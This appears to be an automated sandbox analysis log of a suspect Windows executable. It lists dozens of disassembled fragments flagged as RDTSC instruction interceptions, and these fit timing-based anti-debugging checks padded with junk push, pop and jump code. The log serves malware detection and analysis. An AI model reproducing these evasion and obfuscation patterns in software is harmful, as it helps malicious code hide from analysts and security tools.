Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1050156 second address: 1050160 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0D8517B912h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1057CEF second address: 1057CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F0D8517B90Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1058276 second address: 105828A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F0D84D6201Eh 0x0000000c rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 105828A second address: 10582BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D8517B90Dh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F0D8517B914h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10582C1 second address: 10582D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0D8517B90Ah 0x0000000c jnl 00007F0D8517B906h 0x00000012 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10582D8 second address: 10582FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D84D62029h 0x00000007 jc 00007F0D84D62016h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1058894 second address: 10588C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F0D84D62036h 0x0000000e rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10588C2 second address: 10588CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F0D8517B906h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1059127 second address: 1059142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D84D62027h 0x00000009 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1059146 second address: 105917C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jne 00007F0D84D62016h 0x00000011 push eax 0x00000012 pop eax 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 jbe 00007F0D84D62018h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F0D84D62024h 0x00000025 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 105DD83 second address: 105DD8D instructions: 0x00000000 rdtsc 0x00000002 js 00007F0D84D62016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 105DD8D second address: 105DD97 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0D8517B90Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1061B4E second address: 1061B5F instructions: 0x00000000 rdtsc 0x00000002 js 00007F0D84D62016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1060DF3 second address: 1060E10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F0D84D62027h 0x0000000b rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1060FB8 second address: 1060FD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F0D8517B906h 0x0000000a jmp 00007F0D8517B911h 0x0000000f rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 106116B second address: 10611A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F0D8517B912h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0D8517B916h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10611A4 second address: 10611AE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0D8517B906h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10615E4 second address: 1061600 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D84D62026h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1061606 second address: 1061625 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D84D62021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F0D84D62016h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1068908 second address: 1068920 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0D8517B912h 0x0000000b rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 4F602E0 second address: 4F602E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 4F602E4 second address: 4F602EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 4F602EA second address: 4F60330 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D8517B912h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, ax 0x00000010 pushfd 0x00000011 jmp 00007F0D8517B916h 0x00000016 add si, ACD8h 0x0000001b jmp 00007F0D8517B90Bh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 4F60330 second address: 4F60335 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 4F6035F second address: 4F60377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D8517B914h 0x00000009 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 4F60377 second address: 4F6037B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF13B6 second address: FF13DB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0D8517B906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0D8517B919h 0x00000011 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF13DB second address: FF13FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D84D62028h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FC0672 second address: FC06E7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jc 00007F0D84D62016h 0x0000000d pop ebx 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 or dword ptr [ebp+122D183Dh], ecx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007F0D84D62018h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 xor di, F4F7h 0x00000039 call 00007F0D84D62019h 0x0000003e pushad 0x0000003f jnl 00007F0D84D6201Ch 0x00000045 jnl 00007F0D84D62016h 0x0000004b jmp 00007F0D84D62024h 0x00000050 popad 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push esi 0x00000055 push edx 0x00000056 pop edx 0x00000057 pop esi 0x00000058 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FC088E second address: FC08AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D8517B919h 0x00000009 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FC08AF second address: FC0903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F0D8517B908h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 mov edx, ecx 0x00000025 push ebx 0x00000026 movzx edi, cx 0x00000029 pop edi 0x0000002a push 00000000h 0x0000002c cmc 0x0000002d call 00007F0D8517B909h 0x00000032 push ecx 0x00000033 jmp 00007F0D8517B910h 0x00000038 pop ecx 0x00000039 push eax 0x0000003a pushad 0x0000003b push esi 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FC0903 second address: FC093F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop esi 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jnl 00007F0D84D62037h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FC0943 second address: FC09CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D84D62027h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f jmp 00007F0D84D62025h 0x00000014 jno 00007F0D84D62018h 0x0000001a popad 0x0000001b pop eax 0x0000001c mov cl, 8Ah 0x0000001e push 00000003h 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007F0D84D62018h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 00000014h 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a clc 0x0000003b push 00000000h 0x0000003d movzx ecx, ax 0x00000040 or dword ptr [ebp+122D1B14h], ecx 0x00000046 push 00000003h 0x00000048 jp 00007F0D84D62021h 0x0000004e js 00007F0D84D6201Bh 0x00000054 push C7DDA189h 0x00000059 pushad 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FC09CB second address: FC0A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnp 00007F0D8517B90Ch 0x0000000b popad 0x0000000c xor dword ptr [esp], 07DDA189h 0x00000013 mov edx, eax 0x00000015 or dword ptr [ebp+122D339Bh], esi 0x0000001b lea ebx, dword ptr [ebp+1245258Ah] 0x00000021 push 00000000h 0x00000023 push esi 0x00000024 call 00007F0D8517B908h 0x00000029 pop esi 0x0000002a mov dword ptr [esp+04h], esi 0x0000002e add dword ptr [esp+04h], 00000015h 0x00000036 inc esi 0x00000037 push esi 0x00000038 ret 0x00000039 pop esi 0x0000003a ret 0x0000003b jmp 00007F0D8517B910h 0x00000040 or edx, 289F7802h 0x00000046 push eax 0x00000047 js 00007F0D8517B910h 0x0000004d push eax 0x0000004e push edx 0x0000004f push edi 0x00000050 pop edi 0x00000051 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FC0AA8 second address: FC0B46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jmp 00007F0D8517B90Ch 0x0000000d push 00000000h 0x0000000f movsx esi, cx 0x00000012 push C557B7A8h 0x00000017 jmp 00007F0D8517B916h 0x0000001c add dword ptr [esp], 3AA848D8h 0x00000023 jnc 00007F0D8517B90Bh 0x00000029 or cx, CB62h 0x0000002e push 00000003h 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F0D8517B908h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a push edx 0x0000004b xor dword ptr [ebp+122D36BDh], esi 0x00000051 pop esi 0x00000052 add si, 0124h 0x00000057 push 00000000h 0x00000059 clc 0x0000005a push 00000003h 0x0000005c add edi, 22F52181h 0x00000062 push 9A50CA96h 0x00000067 push eax 0x00000068 push edx 0x00000069 push ebx 0x0000006a jmp 00007F0D8517B916h 0x0000006f pop ebx 0x00000070 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FE0187 second address: FE0195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0D84D62016h 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDE64B second address: FDE65D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D8517B90Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDE65D second address: FDE66D instructions: 0x00000000 rdtsc 0x00000002 je 00007F0D84D62022h 0x00000008 jns 00007F0D84D62016h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDE7BD second address: FDE7C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F0D8517B906h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDE7C9 second address: FDE7E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D84D62025h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDE7EA second address: FDE81D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D84D62021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0D84D62026h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDE81D second address: FDE837 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D8517B916h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDE837 second address: FDE849 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0D84D62018h 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F0D84D62016h 0x00000010 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDECF8 second address: FDED02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0D8517B906h 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FDF40B second address: FDF426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jl 00007F0D8517B906h 0x0000000c popad 0x0000000d push esi 0x0000000e jl 00007F0D8517B906h 0x00000014 push edi 0x00000015 pop edi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FE2311 second address: FE2323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jc 00007F0D8517B906h 0x00000012 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FA5A86 second address: FA5AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 jc 00007F0D84D62018h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F0D84D6201Ch 0x00000016 push edi 0x00000017 jp 00007F0D84D62016h 0x0000001d jc 00007F0D84D62016h 0x00000023 pop edi 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FEB2BE second address: FEB2D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D8517B911h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FEA79A second address: FEA7AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F0D8517B906h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FEAA53 second address: FEAA6D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F0D8517B918h 0x0000000c jmp 00007F0D8517B90Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FEAF92 second address: FEAFAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D84D62023h 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FEAFAA second address: FEAFC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0D8517B917h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FF0535 second address: FF055A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0D84D6202Bh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: FFEFDB second address: FFEFEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D8517B90Ch 0x00000009 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1000022 second address: 100002C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0D84D62016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 100BE17 second address: 100BE26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007F0D84D62016h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1069354 second address: 1069361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnl 00007F0D8517B906h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 106A4F8 second address: 106A516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0D8517B915h 0x0000000e rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1070C7F second address: 1070C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D84D62022h 0x00000009 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1070F26 second address: 1070F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D8517B919h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F0D8517B906h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 107D8CB second address: 107D8DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D8517B90Bh 0x00000009 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 107D8DA second address: 107D8F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D84D62021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 107D42F second address: 107D47A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0D84D62025h 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007F0D84D62016h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 jmp 00007F0D84D62024h 0x0000001a pop eax 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e jmp 00007F0D84D6201Ch 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 107D5A9 second address: 107D5C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 ja 00007F0D8517B906h 0x0000000d jg 00007F0D8517B906h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 107D5C2 second address: 107D5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0D84D62016h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0D84D6201Bh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1082A61 second address: 1082A71 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0D84D62016h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10824A7 second address: 10824B9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0D8517B906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F0D8517B90Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10957AB second address: 10957B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0D84D62016h 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10957BB second address: 1095804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F0D84D6201Ch 0x0000000c jbe 00007F0D84D62016h 0x00000012 push esi 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 pop edx 0x00000017 pop esi 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F0D84D62022h 0x00000020 push esi 0x00000021 jmp 00007F0D84D62024h 0x00000026 jbe 00007F0D84D62016h 0x0000002c pop esi 0x0000002d rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 109C9A0 second address: 109C9AA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0D8517B906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 109C9AA second address: 109C9B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F0D84D62016h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10A1ADE second address: 10A1AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D84D6201Ah 0x00000009 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10A1AF2 second address: 10A1B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F0D84D6202Bh 0x0000000c jmp 00007F0D84D6201Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10A6B76 second address: 10A6B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jnl 00007F0D84D62016h 0x0000000c jmp 00007F0D84D6201Dh 0x00000011 pop ecx 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
